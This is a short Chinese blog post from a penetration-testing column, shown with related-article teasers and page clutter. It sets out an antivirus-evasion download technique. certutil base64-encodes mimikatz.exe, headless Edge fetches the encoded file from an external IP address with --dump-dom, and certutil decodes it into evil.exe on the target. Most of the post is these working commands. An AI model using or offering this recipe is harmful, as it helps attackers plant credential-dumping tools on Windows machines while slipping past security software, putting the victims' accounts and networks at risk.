利用chrome/edge下载文件

最新推荐文章于 2024-10-17 15:41:51 发布
最新推荐文章于 2024-10-17 15:41:51 发布
阅读量393 收藏
点赞数
分类专栏: 内网渗透 文章标签: chrome edge windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44747030/article/details/129169656
版权
文章描述了一种利用certutil命令进行base64编码和解码的技巧,结合Chrome或Edge浏览器下载exe文件,可能涉及恶意软件的传播。这个过程包括编码文件,通过浏览器下载远程资源,然后解码生成可执行文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

现在不混淆命令直接执行certutil命令直接就会被杀

在这里插入图片描述

使用certutil对文件进行base64编码
certutil -encode mimikatz.exe evil.b64.html

使用chrome\edge下载exe
"C:\Program Files (x86)\Microsoft\EdgeCore\110.0.1587.50\msedge.exe" --headless --enable-logging --disable-gpu --dump-dom http://205.185.114.68:8114/evil.b64.html > evil.b64.html

解码文件
certutil -decode evil.b64.html C:\Users\rkvir\Downloads\evil.exe

发的tcp的包

在这里插入图片描述

一些有趣的Chrome命令行调用例子
拙言的专栏
05-10 662
这些命令行参数可以单独使用,也可以组合使用以实现特定的行为。使用这些参数时,请确保它们适用于你当前的Chrome版本和操作系统。一些参数可能需要管理员权限才能生效。Chrome浏览器支持多种命令行参数,这些参数可以用于定制浏览器行为或进行调试。
edge无法直接下载文件,询问是否保留
q2476368047的博客
04-24 5328
这个问题困恼了我好久,因为每天工作要从下载很多文件,每次下载都询问是否保留,真的很烦,最后终于找到了设置,看网上没有我发现的这个方法,特写出来发一下。第三步:找到不安全内容,选择允许。第一步:点击网址这个不安全提醒。第二步:点击此网站权限。就不会询问是否保留了。
Chrome浏览器直接下载pdf文件的设置步骤
Alexabc3000的专栏
04-28 7574
使用Google Chrome浏览器,在点击网页中的pdf文件时,浏览器会直接将pdf文件打开并显示,要下载pdf文件的话,还需要进行另存操作。 有的时候我们点击pdf文件就是为了直接下载,而不是为了在浏览器中查看pdf文件。可以按以下步骤更改浏览器的设置(浏览器版本:5.1.3.14 (32 位)),达到直接下载pdf文件的目的。 进入设置页面; 点击“高级版PDF功能”; 打开“下载PDF文件,而不是在浏览器中直接打开它们”右侧的开关。就是点击该开关,使其由灰色变为蓝色。 也可以直接在浏览器地址
Chrome浏览器下载提示另存为或保留的解决办法
weixin_46717135的博客
10-17 1万+
谷歌Chrome浏览器下载提示另存为或保留解决办法
渗透中Windows利用Certutil进行文件下载
大河之犬的博客
09-26 3412
是一个合法Windows文件,用于管理Windows证书的程序。此合法Windows服务现已被广泛滥用于恶意用途渗透中主要利用下载、编码、解码、替代数据流等功能可以在命令行用certutil -?
Edge下载文件提示无法安全下载的解决方法
Shiny_boy_的博客
04-25 4333
window+r 输入 regedit 打开注册表。最后新建字符串值:名称1,值[*.]
Chrome 命令
猿来这样-谢厂节的博客
10-20 1642
命令行参数允许跨域chrome --allow-file-access-from-files使用代理--proxy-server=127.0.0.1:8087 映射–host-rules=”MAP *.abc.com 192.168.1.139” 映射host 允许读取缓存–enable-offline-mode地址栏 命令chrome://plugins 或 about:plugins 1. ch
Tampermonkey BETA 4.20.6187-0 Chrome/Edge插件快速安装指南
- 在安装任何类型的扩展程序之前,确保下载文件没有受到病毒或恶意软件的侵害,尽量从官方网站或可信的来源下载。 - 对于测试版或beta版本的插件,可能存在未修复的bug或者不稳定因素,使用时需要谨慎。 - 手动...
解决Win10 Chrome/Edge浏览器崩溃问题的STATUS_INVALID_IMAGE_HASH
资源摘要信息:"STATUS_INVALID_IMAGE_HASH是Windows系统中的一种错误提示,通常发生在使用Microsoft EdgeChrome浏览器时。这个错误的原因可能包括缓存文件损坏、系统文件损坏或被篡改、浏览器插件或扩展问题等。...
pageassist-2025.2.7-chrome-edge
最新发布
02-07
我们得知“pageassist-2025.2.7-chrome-edge用”是一款高度集成的人工智能辅助工具,它利用ollama平台创建的AI大模型,通过“pageassist”这一接口与ChromeEdge浏览器进行交互,提供智能化的网页内容处理和深度...
电脑软件EdgeChrome浏览器.rar
10-16
标题中的“电脑软件EdgeChrome浏览器.rar”表明这是一个关于Microsoft Edge和Google Chrome浏览器的压缩包文件,可能包含安装程序、更新文件或者与这两款浏览器相关的辅助工具。在描述中,“电脑软件EdgeChrome...
linux-edge浏览器文件及所需依赖
03-23
Linux Edge浏览器旨在提供与Windows版本类似的用户体验,同时充分利用Linux平台的优势。这个压缩包文件包含了Linux Edge浏览器的安装文件以及可能需要的一些依赖项,以便在Linux环境中顺利运行。 首先,我们来详细...
Chrome浏览器下载而非打开文件
每天学习一点点,每天记录一点点
05-09 4772
介绍了如何指定浏览器处理附件的方式并指定下载附件时的文件
Win10系统下禁止ie浏览器自动跳转到Microsoft Edge浏览器
曾经也曾立志
12-23 2万+
Win10系统下禁止ie浏览器自动跳转到Microsoft Edge浏览器
2023.02.14后取消IE强制跳转Edge
liufanglei077的博客
02-20 927
IE强制跳转Edge
三星浏览器高阶使用技巧-修改CountryCode和UA
秋不溜秋的博客
02-24 1万+
通过修改浏览器国家代码和UA来实现默认Google搜索、清除国内流氓主页和阻止外链强制跳转到应用商店或者已安装的国内流氓软件(以百度、知乎为例)
使用Chrome浏览器自动下载文件并保存到指定的文件路径(使用Selenium更改Chrome默认下载存储路径)
热门推荐
软测小生
07-25 3万+
本文首发于微信公众号: 软测小生 上一篇博客写到当不能使用Selenium来操作上传下载接面的时候,我们使用第三方AutoIt来搞定。Java+Selenium2+autoIt 实现Chrome右键文件另存为 功能 接下来我我要记录一下今天学的使用Selenium更改Chrome默认下载存储路径,当然前提是在网页上有下载链接直接点击就会下载的,若不更改的话就会保存到Chrome默认下载路径下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值